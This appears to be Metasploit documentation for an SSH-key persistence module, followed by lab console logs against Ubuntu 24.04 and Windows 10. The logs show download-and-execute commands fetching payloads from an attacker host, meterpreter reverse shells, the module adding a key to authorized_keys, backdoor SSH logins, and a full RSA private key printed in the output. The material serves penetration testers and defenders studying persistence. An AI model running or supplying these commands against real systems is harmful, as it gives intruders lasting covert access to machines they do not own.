## Description This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time. This module has been tested against: 1. Ubuntu 24.04 2. Windows 10 ### Creating A Testing Environment #### Windows [Instructions](https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell&pivots=windows-10) ``` Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 (Get-Content "$env:ProgramData\ssh\sshd_config") -replace '^\s*#\s*(PubkeyAuthentication\s+.*)', '$1' | Set-Content "$env:ProgramData\ssh\sshd_config" Set-Service -Name sshd -StartupType Automatic Start-Service -Name sshd ``` ##### Testing Notes Windows was difficult to test. The `PubkeyAuthentication` field seems to default to `yes` even when commented out. For logins, ``` Match Group administrators AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys ``` is the default (as of 1809?). When this is in place, user `authorized_keys` are ignored, and only the `administrators_authorized_keys` is checked. When this is commented out, only user's `authorized_keys` are checked (as expected). ## Verification Steps 1. Start msfconsole 2. Exploit a box via whatever method 3. Do: `use exploit/multi/persistence/ssh_key` 4. Do: `set session #` 5. Optional Do: `set username` 6. Do: `set verbose true` 7. Do: `exploit` ## Options ### SSHD_CONFIG Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to `.ssh/authorized_keys` ### USERNAME If set, we only write our key to this user. If not, we'll write to all users. On Windows setting `admin` or `administrator` will force writing to the Admin's `authorized_keys` ### PUBKEY Path to a public key to use. If not provided, a pub/priv key pair is generated automatically ### CREATESSHFOLDER If no .ssh folder is found, create it for the target user. Defaults to `false` ## Scenarios ### Ubuntu 24.04 Get original shell ``` [*] Processing /root/.msf4/msfconsole.rc for ERB directives. resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set srvport 8082 srvport => 8082 resource (/root/.msf4/msfconsole.rc)> set uripath l uripath => l resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4446 lport => 4446 resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4446 [*] Using URL: http://1.1.1.1:8082/l [*] Server started. [*] Run the following command on the target machine: wget -qO 7kQHbL1b --no-check-certificate http://1.1.1.1:8082/l; chmod +x 7kQHbL1b; ./7kQHbL1b& disown msf exploit(multi/script/web_delivery) > [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:40288) at 2025-12-15 20:18:05 -0500 ``` Persistence install ``` msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/ssh_key [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(multi/persistence/ssh_key) > set session 1 session => 1 msf exploit(multi/persistence/ssh_key) > exploit [*] Command to run on remote host: curl -so ./yGgUYcAsWEy http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./yGgUYcAsWEy;./yGgUYcAsWEy& [*] Exploit running as background job 1. msf exploit(multi/persistence/ssh_key) > [*] Running automatic check ("set AutoCheck false" to disable) [*] Checking SSH Permissions [+] The target appears to be vulnerable. Likely vulnerable [!] Payload handler is disabled, the persistence will be installed only. [*] Determining authorized_keys file [*] Authorized Keys File: .ssh/authorized_keys [*] Found 25 potential user folders [!] No .ssh folder found for //.ssh, skipping... [!] No //.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /bin/.ssh, skipping... [!] No /bin/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /dev/.ssh, skipping... [!] No /dev/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /nonexistent/.ssh, skipping... [!] No /nonexistent/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /root/.ssh, skipping... [!] No /root/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /run/ircd/.ssh, skipping... [!] No /run/ircd/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /run/sshd/.ssh, skipping... [!] No /run/sshd/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /run/uuidd/.ssh, skipping... [!] No /run/uuidd/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /usr/games/.ssh, skipping... [!] No /usr/games/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /usr/lib/dhcpcd/.ssh, skipping... [!] No /usr/lib/dhcpcd/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /usr/sbin/.ssh, skipping... [!] No /usr/sbin/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/backups/.ssh, skipping... [!] No /var/backups/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/cache/man/.ssh, skipping... [!] No /var/cache/man/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/cache/pollinate/.ssh, skipping... [!] No /var/cache/pollinate/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/lib/fwupd/.ssh, skipping... [!] No /var/lib/fwupd/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/lib/landscape/.ssh, skipping... [!] No /var/lib/landscape/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/lib/tpm/.ssh, skipping... [!] No /var/lib/tpm/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/lib/usbmux/.ssh, skipping... [!] No /var/lib/usbmux/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/list/.ssh, skipping... [!] No /var/list/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/mail/.ssh, skipping... [!] No /var/mail/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/spool/lpd/.ssh, skipping... [!] No /var/spool/lpd/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/spool/news/.ssh, skipping... [!] No /var/spool/news/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/spool/uucp/.ssh, skipping... [!] No /var/spool/uucp/.ssh/authorized_keys file found, skipping... [!] No .ssh folder found for /var/www/.ssh, skipping... [!] No /var/www/.ssh/authorized_keys file found, skipping... [*] Found 1 confirmed user folders [+] Storing new private key as /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt [*] Adding key to /home/ubuntu/.ssh/authorized_keys [+] Persistence installed! Call a shell using 'ssh -i /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt @2.2.2.2' [+] use auxiliary/scanner/ssh/ssh_login [+] run KEY_PATH=/root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt RHOSTS=2.2.2.2 USERNAME= [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/2.2.2.2_20251215.1841/2.2.2.2_20251215.1841.rc ``` Trigger via metasploit ``` msf exploit(multi/persistence/ssh_key) > use auxiliary/scanner/ssh/ssh_login [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf auxiliary(scanner/ssh/ssh_login) > run KEY_PATH=/root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt RHOSTS=2.2.2.2 USERNAME=ubuntu VERBOSE=false [*] 2.2.2.2:22 - Starting bruteforce [*] 2.2.2.2:22 SSH - Testing Cleartext Keys [+] 2.2.2.2:22 - Success: 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd) Linux ubuntu2404 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux ' [*] SSH session 2 opened (1.1.1.1:40385 -> 2.2.2.2:22) at 2025-12-15 20:21:13 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` Manually trigger ``` msf auxiliary(scanner/ssh/ssh_login) > chmod 600 /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt [*] exec: chmod 600 /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt msf auxiliary(scanner/ssh/ssh_login) > ssh -i /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt ubuntu@2.2.2.2 [*] exec: ssh -i /root/.msf4/loot/20251215201840_default_2.2.2.2_id_rsa_950788.txt ubuntu@2.2.2.2 Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-31-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Tue Dec 16 01:21:12 AM UTC 2025 System load: 0.08 Processes: 220 Usage of /: 27.3% of 23.45GB Users logged in: 1 Memory usage: 5% IPv4 address for ens160: 2.2.2.2 Swap usage: 0% * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment. https://ubuntu.com/engage/secure-kubernetes-at-the-edge Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Tue Dec 16 01:09:33 2025 from 1.1.1.1 ubuntu@ubuntu2404:~$ id uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd) ubuntu@ubuntu2404:~$ exit logout Connection to 2.2.2.2 closed. msf auxiliary(scanner/ssh/ssh_login) > ``` ### Windows 10 Fresh install of SSH, followed the instructions included in these docs. ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL fetch_command => CURL resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true fetch_pipe => true resource (/root/.msf4/msfconsole.rc)> set lport 4450 lport => 4450 resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 FETCH_URIPATH => w3 resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB FETCH_FILENAME => mkaKJBzbDB resource (/root/.msf4/msfconsole.rc)> to_handler [*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe [*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd [*] Payload Handler Started as Job 0 [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /KAdxHNQrWO8cy5I90gLkHg [*] Adding resource /w3 [*] Started reverse TCP handler on 1.1.1.1:4450 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg [*] Sending payload to 2.2.2.2 (curl/7.79.1) [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:59009) at 2025-12-19 17:04:57 -0500 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/ssh_key [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(multi/persistence/ssh_key) > set session 1 session => 1 msf exploit(multi/persistence/ssh_key) > set CREATESSHFOLDER true CREATESSHFOLDER => true msf exploit(multi/persistence/ssh_key) > set username admin username => admin msf exploit(multi/persistence/ssh_key) > exploit stty: 'standard input': unable to perform all requested operations [*] Command to run on remote host: curl -so ./jCmJxTXYN http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./jCmJxTXYN;./jCmJxTXYN& [*] Exploit running as background job 1. msf exploit(multi/persistence/ssh_key) > msf exploit(multi/persistence/ssh_key) > [*] Running automatic check ("set AutoCheck false" to disable) [*] Checking SSH Permissions [-] Pubkey Authentication disabled [*] Attempting to enable pubkey authentication in sshd_config [+] PubkeyAuthentication enabled successfully [+] The target appears to be vulnerable. Likely vulnerable [!] Payload handler is disabled, the persistence will be installed only. [*] Determining authorized_keys file [*] Found 1 potential user folders [*] Found 1 confirmed user folders [+] Storing new private key as /root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt [*] Adding key to C:\ProgramData\ssh\administrators_authorized_keys [+] Persistence installed! Call a shell using 'ssh -i /root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt @2.2.2.2' [+] use auxiliary/scanner/ssh/ssh_login [+] run KEY_PATH=/root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt RHOSTS=2.2.2.2 USERNAME= [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251219.1408/WIN10PROLICENSE_20251219.1408.rc msf exploit(multi/persistence/ssh_key) > use auxiliary/scanner/ssh/ssh_login [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf auxiliary(scanner/ssh/ssh_login) > run KEY_PATH=/root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt RHOSTS=2.2.2.2 USERNAME=windows [*] 2.2.2.2:22 - Starting bruteforce [*] 2.2.2.2:22 SSH - Testing Cleartext Keys [*] Testing 1 key from /root/.msf4/loot/20251219171407_default_2.2.2.2_id_rsa_295084.txt [+] 2.2.2.2:22 - Success: 'Microsoft Windows 10 Pro 10.0.18363 N/A Build 18363' [+] 2.2.2.2:22 - windows:-----BEGIN RSA PRIVATE KEY----- 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 -----END RSA PRIVATE KEY----- ', ' ')}' [*] SSH session 2 opened (1.1.1.1:33749 -> 2.2.2.2:22) at 2025-12-19 17:14:39 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(scanner/ssh/ssh_login) > sessions -i 2 [*] Starting interaction with 2... Microsoft Windows [Version 10.0.18363.2274] (c) 2019 Microsoft Corporation. All rights reserved. windows@WIN10PROLICENSE C:\Users\windows> windows@WIN10PROLICENSE C:\Users\windows>whoami whoami win10prolicense\windows ```